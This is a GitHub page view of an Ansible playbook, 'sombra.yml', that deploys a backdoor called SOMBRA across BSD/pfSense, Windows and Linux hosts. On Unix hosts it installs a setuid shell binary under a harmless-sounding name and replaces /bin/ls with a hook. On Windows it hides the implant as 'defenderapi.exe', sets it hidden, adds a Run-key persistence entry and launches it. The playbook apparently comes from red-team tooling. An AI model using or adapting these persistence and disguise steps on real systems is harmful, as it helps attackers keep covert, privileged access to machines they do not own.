-
Notifications
You must be signed in to change notification settings - Fork 0
/
sombra.yml
114 lines (96 loc) · 2.91 KB
/
sombra.yml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
######################################################################
#
# BSD Boxes
#
######################################################################
- name: SOMBRA | Install shell | BSD
copy:
src: sombra-bsd
dest: /usr/bin/common-init
mode: 4755
when: ansible_os_family == 'FreeBSD'
- name: SOMBRA | Move ls | BSD
copy:
remote_src: yes
src: /bin/ls
dest: /usr/bin/list
when: ansible_os_family == 'FreeBSD'
- name: SOMBRA | Copy ls hook | pfSense
copy:
src: ls-bsd
dest: /bin/ls
mode: 755
when: ansible_os_family == 'FreeBSD'
- name: SOMBRA | Init Shell | pfSense
shell: "/bin/ls"
when: ansible_os_family == 'FreeBSD'
######################################################################
#
# Windows Boxes
#
######################################################################
- name: SOMBRA | Copy Win10Pcap MSI | Windows
copy:
src: "win10pcap.msi"
dest: "C:\\ProgramData\\win10pcap.msi"
when: ansible_os_family == 'Windows'
- name: SOMBRA | Install Win10Pcap | Windows
win_package:
path: 'C:\\ProgramData\\win10pcap.msi'
arguments: 'ALLUSERS=1 /quiet'
state: present
- name: SOMBRA | Delete Win10Pcap MSI | Windows
win_file:
path: 'C:\\ProgramData\\win10pcap.msi'
state: 'absent'
- name: SOMBRA | Copy shell | Windows
copy:
src: "sombra.exe"
dest: "C:\\ProgramData\\defenderapi.exe"
when: ansible_os_family == 'Windows'
- name: SOMBRA | Hide shell | Windows
win_command: "attrib +h 'C:\\ProgramData\\defenderapi.exe'"
when: ansible_os_family == 'Windows'
- name: SOMBRA | Add run key persistence | Windows
win_regedit:
path: 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run'
name: "defender"
data: "C:\\ProgramData\\defenderapi.exe"
type: string
when: ansible_os_family == 'Windows'
- name: SOMBRA | Run agent | Windows
win_shell: 'runas /trustlevel:0x20000 defenderapi.exe'
async: 45
poll: 0
args:
chdir: 'C:\\ProgramData'
when: ansible_os_family == 'Windows'
######################################################################
#
# Linux Boxes
#
######################################################################
- name: SOMBRA | Define Linux Distros
set_facts:
linux_distros: ["RedHat", "CentOS", "Fedora", "Scientific", "CloudLinux", "OracleLinux", "Amazon", "XenServer", "Debian", "Ubuntu", "SUSE", "SLED", "SLES", "Gentoo", "Archlinux", "Mandrake", "Alpine"]
- name: SOMBRA | Install shell | Linux
copy:
src: sombra
dest: /usr/bin/common-init
mode: 4755
when: ansible_os_family in linux_distros
- name: SOMBRA | Move ls | Linux
copy:
remote_src: yes
src: /bin/ls
dest: /usr/bin/list
when: ansible_os_family in linux_distros
- name: SOMBRA | Copy ls hook | Linux
copy:
src: ls
dest: /bin/ls
mode: 755
when: ansible_os_family in linux_distros
- name: SOMBRA | Init Shell | Linux
shell: "/bin/ls"
when: ansible_os_family in linux_distros